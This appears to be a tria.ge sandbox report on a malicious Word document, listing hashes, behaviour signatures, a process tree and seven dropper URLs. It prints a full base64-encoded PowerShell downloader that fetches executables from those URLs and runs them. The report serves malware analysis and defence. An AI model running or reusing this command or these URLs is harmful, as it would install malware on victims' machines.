Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    121s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    08/09/2024, 03:55

General

  • Target

    d37abef20b2749210d8aad65f0bc09e3_JaffaCakes118.doc

  • Size

    227KB

  • MD5

    d37abef20b2749210d8aad65f0bc09e3

  • SHA1

    7279d14b6a86a129bf433f2bcae642819e8afedf

  • SHA256

    30a43e3c1b38fe5a37ce0fcdcaee4cef05b4d6682e668d782131c7c54de0e292

  • SHA512

    0b08b0afd963c4c3265c6c91211741a0ec760f9c7aef6c29d3e887b76035410b6e625e0459811d982155d753c2d89c6eb14cd8f96cf9d086c6f0e68106b39fe7

  • SSDEEP

    3072:PYy0u8YGgjv+ZvchmkHcI/o1/Vb6///////////////////////////////////s:R0uXnWFchmmcI/o1/uEP9cPwc2

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://miradoors.md/backup/hFiCHxXv/

exe.dropper

http://kuntur.tur.ar/wp-admin/OBoiKylqUuhlh/

exe.dropper

https://mhsr.ch/wp-admin/qHvi9amkg5llk43185606/

exe.dropper

http://miradoors.ro/cgi-bin/vhUgA4mu6tg1x461/

exe.dropper

http://nikniek.nl/cgi-bin/A74t5p0sobrc273635587/

exe.dropper

http://qualityhairbundles.com/of/FIKQDxATiQHEd/

exe.dropper

http://karaz.atwebpages.com/admin/2a4j1aqkks855324/

Signatures

  • Blocklisted process makes network request 7 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d37abef20b2749210d8aad65f0bc09e3_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2260
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2628
    • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
      powersheLL -e JABYAGIAcwBjAGMAMQAwAD0AKAAoACcAWQA0ACcAKwAnAHUAZgAnACkAKwAoACcAcAAnACsAJwB4AGYAJwApACkAOwAmACgAJwBuACcAKwAnAGUAdwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABlAG4AdgA6AHQAZQBNAFAAXABXAE8AcgBkAFwAMgAwADEAOQBcACAALQBpAHQAZQBtAHQAeQBwAGUAIABkAGkAUgBFAGMAVABvAHIAeQA7AFsATgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6ACIAcwBgAEUAYwBVAFIAaQB0AFkAUABSAG8AdABvAGAAQwBgAG8AbAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzADEAMgAsACcAKQArACgAJwAgACcAKwAnAHQAbAAnACkAKwAoACcAcwAxACcAKwAnADEAJwApACsAKAAnACwAJwArACcAIAB0AGwAJwApACsAJwBzACcAKQA7ACQARQByAGkAcAB0AG8AaAAgAD0AIAAoACgAJwBHAGwAJwArACcAawAnACsAJwB0ADAANwBjACcAKQArACcAOQAnACkAOwAkAFkAYwBpAHUAegBkADMAPQAoACgAJwBHADQAYwAnACsAJwBxACcAKQArACcAZwAnACsAJwBuADMAJwApADsAJABNAHUAbwBiAGwANgB5AD0AJABlAG4AdgA6AHQAZQBtAHAAKwAoACgAJwBQACcAKwAoACcAdgAnACsAJwBEAHcAJwApACsAKAAnAG8AcgAnACsAJwBkACcAKQArACgAJwBQAHYAJwArACcARAAyACcAKwAnADAAMQA5AFAAdgAnACsAJwBEACcAKQApAC0AUgBFAHAAbABBAEMARQAoACcAUAAnACsAJwB2AEQAJwApACwAWwBjAEgAYQByAF0AOQAyACkAKwAkAEUAcgBpAHAAdABvAGgAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAFcAZABzAGwAcwB1AHQAPQAoACgAJwBOACcAKwAnAGcAaQAnACkAKwAoACcAZAAnACsAJwB6AHkAJwApACsAJwBhACcAKQA7ACQAUQByADIAMwBjAG4AOAA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AbwAnACsAJwBiAGoAZQAnACsAJwBjAHQAJwApACAAbgBlAHQALgB3AEUAYgBjAEwAaQBlAE4AVAA7ACQAVQBtADkAaQAxADQAZAA9ACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAOgAvACcAKQArACgAJwAvAG0AJwArACcAaQByAGEAZAAnACsAJwBvAG8AJwApACsAJwByACcAKwAoACcAcwAuACcAKwAnAG0AJwApACsAKAAnAGQALwAnACsAJwBiACcAKQArACcAYQBjACcAKwAnAGsAdQAnACsAJwBwAC8AJwArACcAaABGACcAKwAoACcAaQBDAEgAJwArACcAeABYAHYAJwArACcALwAqAGgAdAAnACkAKwAnAHQAcAAnACsAKAAnADoALwAvAGsAdQBuACcAKwAnAHQAdQByACcAKQArACgAJwAuAHQAJwArACcAdQByACcAKQArACgAJwAuAGEAJwArACcAcgAnACkAKwAnAC8AdwAnACsAJwBwACcAKwAnAC0AJwArACgAJwBhACcAKwAnAGQAbQBpACcAKQArACcAbgAvACcAKwAnAE8AJwArACcAQgBvACcAKwAoACcAaQBLAHkAJwArACcAbABxACcAKQArACgAJwBVAHUAJwArACcAaABsAGgALwAnACsAJwAqACcAKQArACgAJwBoAHQAJwArACcAdAAnACkAKwAoACcAcABzACcAKwAnADoALwAvAG0AaAAnACkAKwAoACcAcwAnACsAJwByAC4AJwApACsAJwBjAGgAJwArACgAJwAvAHcAcAAnACsAJwAtACcAKQArACcAYQAnACsAJwBkAG0AJwArACcAaQBuACcAKwAoACcALwBxAEgAdgAnACsAJwBpADkAYQBtACcAKwAnAGsAJwApACsAKAAnAGcANQBsACcAKwAnAGwAawA0ACcAKQArACgAJwAzADEAJwArACcAOAA1ADYAMAAnACkAKwAnADYAJwArACgAJwAvACcAKwAnACoAaAB0ACcAKQArACcAdAAnACsAKAAnAHAAJwArACcAOgAvACcAKQArACgAJwAvAG0AJwArACcAaQByACcAKQArACgAJwBhACcAKwAnAGQAbwBvAHIAcwAuACcAKQArACgAJwByAG8ALwBjAGcAJwArACcAaQAtACcAKQArACcAYgAnACsAJwBpACcAKwAoACcAbgAvACcAKwAnAHYAJwApACsAKAAnAGgAVQAnACsAJwBnAEEANAAnACkAKwAoACcAbQB1ADYAJwArACcAdAAnACkAKwAnAGcAMQAnACsAJwB4ACcAKwAoACcANAAnACsAJwA2ADEALwAqAGgAdAAnACsAJwB0AHAAOgAnACkAKwAoACcALwAnACsAJwAvAG4AJwApACsAJwBpACcAKwAoACcAawBuACcAKwAnAGkAJwApACsAKAAnAGUAawAuAG4AJwArACcAbAAnACkAKwAoACcALwBjACcAKwAnAGcAaQAtACcAKQArACcAYgAnACsAKAAnAGkAJwArACcAbgAvAEEANwAnACkAKwAoACcANAB0ADUAJwArACcAcAAnACkAKwAnADAAJwArACcAcwBvACcAKwAoACcAYgByACcAKwAnAGMAMgAnACkAKwAoACcANwAzADYAJwArACcAMwA1ACcAKQArACgAJwA1ACcAKwAnADgANwAvACcAKQArACgAJwAqAGgAJwArACcAdAB0AHAAJwApACsAJwA6ACcAKwAoACcALwAnACsAJwAvAHEAdQAnACkAKwAoACcAYQAnACsAJwBsAGkAJwApACsAKAAnAHQAJwArACcAeQBoACcAKQArACgAJwBhAGkAcgBiACcAKwAnAHUAJwApACsAJwBuACcAKwAnAGQAJwArACgAJwBsAGUAJwArACcAcwAnACkAKwAoACcALgBjAG8AJwArACcAbQAvAG8AZgAvACcAKwAnAEYAJwArACcASQAnACsAJwBLAFEARAB4AEEAJwApACsAJwBUACcAKwAnAGkAUQAnACsAJwBIAEUAJwArACcAZAAnACsAJwAvACoAJwArACcAaAAnACsAKAAnAHQAdAAnACsAJwBwACcAKQArACcAOgAnACsAJwAvACcAKwAoACcALwBrACcAKwAnAGEAcgAnACkAKwAoACcAYQB6ACcAKwAnAC4AYQAnACkAKwAnAHQAdwAnACsAKAAnAGUAJwArACcAYgAnACsAJwBwAGEAZwAnACsAJwBlAHMALgBjAG8AbQAvACcAKQArACgAJwBhACcAKwAnAGQAbQAnACkAKwAnAGkAbgAnACsAKAAnAC8AMgAnACsAJwBhADQAagAnACkAKwAoACcAMQBhAHEAJwArACcAawBrAHMAJwArACcAOAA1ACcAKQArACgAJwA1ADMAMgAnACsAJwA0ACcAKQArACcALwAnACkALgAiAHMAcABMAGAASQBUACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQATwBvAGUAeAAyADAAagA9ACgAJwBVACcAKwAoACcAMgBnADUAYwAnACsAJwBqACcAKQArACcAYwAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABFAHcANwB6AGUAOQBpACAAaQBuACAAJABVAG0AOQBpADEANABkACkAewB0AHIAeQB7ACQAUQByADIAMwBjAG4AOAAuACIARABvAFcATgBMAE8AYABBAGQAYABGAGkAYABsAEUAIgAoACQARQB3ADcAegBlADkAaQAsACAAJABNAHUAbwBiAGwANgB5ACkAOwAkAE8AMABkADMAdQB4AGcAPQAoACgAJwBOADgAYgBzADcAJwArACcAegAnACkAKwAnADEAJwApADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAE0AdQBvAGIAbAA2AHkAKQAuACIATABFAGAATgBHAFQASAAiACAALQBnAGUAIAAzADEAOQA3ADYAKQAgAHsALgAoACcASQAnACsAJwBuACcAKwAnAHYAbwBrAGUALQBJAHQAZQBtACcAKQAoACQATQB1AG8AYgBsADYAeQApADsAJABDADcAMwBpAGUANgA4AD0AKAAoACcAVQAnACsAJwB0ADMAbwAxAGoAJwApACsAJwBqACcAKQA7AGIAcgBlAGEAawA7ACQARwB1ADIAdQBqAHEAOQA9ACgAJwBUAGUAJwArACcANQA5ACcAKwAoACcAMwAnACsAJwA1AGQAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAE8AYgBfAG8AawAyAHAAPQAoACgAJwBFADkAJwArACcAMgBkAG8AJwApACsAJwBfADUAJwApAA==
      1⤵
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2624

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      2eadfa5fb1ecd2f7e66bdf65fd2060d6

      SHA1

      7cf656338e36271501374145d78b7bd411888097

      SHA256

      9e2e14bff9ba0365d42c7747363632d6623b54dc0ced5aad3b3e015931d703f9

      SHA512

      ab27eb94b94fae7a4f23eb0958be7c1a0a50807617f2ce0287c416935b2867646e4616dd04f7e211c43eafb29b5ffc9da78c59ee7892e297a17a976c290c0608

    • memory/2260-25-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-15-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-5-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-6-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-10-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-11-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-9-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-8-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-7-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-12-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-19-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-20-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-21-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-18-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-17-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-16-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-0-0x000000002FF31000-0x000000002FF32000-memory.dmp

      Filesize

      4KB

    • memory/2260-14-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-2-0x0000000070CFD000-0x0000000070D08000-memory.dmp

      Filesize

      44KB

    • memory/2260-13-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-28-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-31-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-29-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-30-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-27-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-26-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-24-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-23-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-22-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-64-0x0000000070CFD000-0x0000000070D08000-memory.dmp

      Filesize

      44KB

    • memory/2260-63-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2260-43-0x0000000070CFD000-0x0000000070D08000-memory.dmp

      Filesize

      44KB

    • memory/2260-44-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-45-0x0000000005B90000-0x0000000005C90000-memory.dmp

      Filesize

      1024KB

    • memory/2260-46-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-47-0x00000000007E0000-0x00000000008E0000-memory.dmp

      Filesize

      1024KB

    • memory/2260-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2624-38-0x0000000001E80000-0x0000000001E88000-memory.dmp

      Filesize

      32KB

    • memory/2624-37-0x000000001B700000-0x000000001B9E2000-memory.dmp

      Filesize

      2.9MB